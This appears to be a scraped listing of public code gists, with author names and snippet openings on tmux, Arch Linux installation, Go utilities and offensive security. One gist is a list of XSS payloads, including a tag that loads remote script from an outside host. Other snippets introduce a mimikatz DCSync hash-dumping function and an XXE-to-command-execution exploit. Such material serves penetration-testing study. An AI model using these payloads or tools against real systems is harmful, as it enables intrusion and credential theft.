MohamedAlaa

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname

rvrsh3ll

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>

mattiaslundberg

# Install ARCH Linux with encrypted file-system and UEFI
# The official installation guide (https://wiki.archlinux.org/index.php/Installation_Guide) contains a more verbose description.

# Download the archiso image from https://www.archlinux.org/
# Copy to a usb-drive
dd if=archlinux.img of=/dev/sdX bs=16M && sync # on linux

# Boot from the usb. If the usb fails to boot, make sure that secure boot is disabled in the BIOS configuration.

# Set swedish keymap

monoxgas

function Invoke-DCSync
{
<#
.SYNOPSIS

Uses dcsync from mimikatz to collect NTLM hashes from the domain.

Author: @monoxgas
Improved by: @harmj0y

unfo

How to pass the OSCP

1. Recon
2. Find vuln
3. Exploit
4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

1N3

#!/bin/sh
#
#      `7MN.   `7MF'       
# __,    MMN.    M         
#`7MM    M YMb   M  pd""b. 
#  MM    M  `MN. M (O)  `8b
#  MM    M   `MM.M      ,89
#  MM    M     YMM    ""Yb.
#.JMML..JML.    YM       88
#                  (O)  .M'

joernchen

This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt 
into a Remote Command Execution:

NOTE: It relies on the PHP expect module being loaded 
(see http://de.php.net/manual/en/book.expect.php)

joern@vbox-1:/tmp$ cat /var/www/server.php 
<?
    require_once("/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php");
    Zend_Loader_Autoloader::getInstance();

chmike

// Please use the package https://github.com/chmike/domain as is it maintained up to date with tests. 

// checkDomain returns an error if the domain name is not valid.
// See https://tools.ietf.org/html/rfc1034#section-3.5 and
// https://tools.ietf.org/html/rfc1123#section-2.
func checkDomain(name string) error {
	switch {
	case len(name) == 0:
		return nil // an empty domain name will result in a cookie without a domain restriction
	case len(name) > 255:

Yawning

// To the extent possible under law, the Yawning Angel has waived all copyright
// and related or neighboring rights to orhttp_example, using the creative
// commons "cc0" public domain dedication. See LICENSE or
// <http://creativecommons.org/publicdomain/zero/1.0/> for full details.

package main

import (
	// Things needed by the actual interface.
	"golang.org/x/net/proxy"

HardenedArray

# OBJECTIVE:  Install Arch Linux with encrypted root and swap filesystems and boot from UEFI.  

# Note this encrypted installation method, while perfectly correct and highly secure, CANNOT support encrypted /boot and 
# also CANNOT be subsequently converted to support an encrypted /boot!!!  A CLEAN INSTALL will be required!

# Therefore, if you want to have an encrypted /boot or will want an encrypted /boot system at some point in the future,
# please ONLY follow my encrypted /boot installation guide, which lives here: